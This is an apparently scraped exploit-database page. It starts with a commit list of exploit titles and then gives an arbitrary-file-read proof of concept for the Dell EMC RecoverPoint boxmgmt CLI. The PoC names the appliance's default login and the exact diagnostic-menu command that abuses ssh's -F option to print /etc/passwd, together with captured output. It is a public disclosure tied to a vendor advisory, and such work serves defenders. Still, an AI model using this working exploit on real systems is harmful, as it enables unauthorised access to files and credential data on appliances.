7bbc323854
20 changes to exploits/shellcodes Siemens SIMATIC S7-1500 CPU - Remote Denial of Service Microsoft Edge Chakra JIT - Magic Value Type Confusion AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read MakeMyTrip 7.2.4 - Information Disclosure Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit) Microsoft Windows - 'POP/MOV SS' Privilege Escalation Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting Multiplayer BlackJack Online Casino Game 2.5 - Cross-Site Scripting Zechat 1.5 - SQL Injection / Cross-Site Request Forgery Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Healwire Online Pharmacy 3.0 - Cross-Site Scripting / Cross-Site Request Forgery Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Private Message PHP Script 2.0 - Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting ManageEngine Recovery Manager Plus 5.3 - Cross-Site Scripting Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Auto Dealership & Vehicle Showroom WebSys 1.0 - Multiple Vulnerabilities Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting Model Agency Media House & Model Gallery 1.0 - Multiple Vulnerabilities Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting Nordex N149/4.0-4.5 - SQL Injection WebSocket Live Chat - Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting PaulPrinting CMS Printing 1.0 - SQL Injection iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery ERPnext 11 - Cross-Site Scripting NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection Auto Car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection Feedy RSS News Ticker 2.0 - 'cat' SQL Injection NewsBee CMS 1.4 - 'download.php' SQL Injection Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting
30 lines
No EOL
1.5 KiB
Text
30 lines
No EOL
1.5 KiB
Text
# Exploit Title: Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read
|
|
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
|
|
# Date: 2018-05-21
|
|
# Vendor Advisory: DSA-2018-095
|
|
# Vendor KB: https://support.emc.com/kb/521234
|
|
# Exploit Author: Paul Taylor
|
|
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
|
|
# Website: https://www.foregenix.com/blog/foregenix-identify-dell-emc-recoverpoint-zero-day-vulnerabilities
|
|
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
|
|
# CVE: N/A
|
|
|
|
# 1. Description
|
|
# When logging in as boxmgmt and running an internal command, the ssh command may be used
|
|
# to display the contents of files from the file system which are accessible to the boxmgmt user.
|
|
|
|
# 2. Proof of Concept
|
|
# Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt)
|
|
# Select [3] Diagnostics
|
|
# Select [5] Run Internal Command
|
|
# ssh -F /etc/passwd 127.0.0.1
|
|
|
|
test-cluster: 5
|
|
This is the list of commands you are allowed to use: ALAT NetDiag arp arping date ethtool kps.pl netstat ping ping6 ssh telnet top uptime
|
|
Enter internal command: ssh -F /etc/passwd 127.0.0.1
|
|
/etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh
|
|
/etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
|
/etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
|
<SNIP>
|
|
/etc/passwd: terminating, 34 bad configuration options
|
|
Command "ssh -F /etc/passwd 127.0.0.1" exited with return code 65280 |